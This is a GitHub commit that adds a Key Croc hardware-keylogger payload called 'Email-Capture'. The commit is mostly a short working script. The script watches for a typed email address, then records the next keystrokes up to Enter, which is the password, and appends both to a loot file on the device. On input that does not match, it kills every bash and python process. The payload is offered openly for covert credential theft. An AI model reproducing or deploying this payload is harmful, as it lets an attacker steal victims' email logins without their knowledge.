Create Email_Capture.txt

Capture target E-mail address & password
pull/59/head
spywill 2023-04-20 10:26:26 +00:00 committed by GitHub
parent 0ef3f8ae6d
commit 433337b9f7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
# Title: Email-Capture
# Description: Capture target E-mail address & password save to /udisk/tools/target_email.txt
# Author: Spywill
# Version: 1.1
# Category: Key Croc
MATCH (^[a-zA-Z0-9_\-\.]+@[a-zA-Z0-9_\-\.]+\.[a-zA-Z]{3,5}$)
pattern='^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{3,5})$'
EMAIL_PASS() {
until [ -f /tmp/target_email_pw.txt.filtered ]; do
:
done
LED G
cat /tmp/target_email_pw.txt.filtered >> /root/udisk/tools/target_email.txt
rm /tmp/target_email_pw.txt /tmp/target_email_pw.txt.filtered
LED OFF
RELOAD_PAYLOADS
}
if [[ "$LOOT" =~ $pattern ]]; then
LED B
echo "$LOOT" >> /root/udisk/tools/target_email.txt
else
LED R
killall -9 bash
killall -9 python
sleep 1
LED OFF
RELOAD_PAYLOADS
fi
SAVEKEYS /tmp/target_email_pw.txt UNTIL ENTER
LED OFF
EMAIL_PASS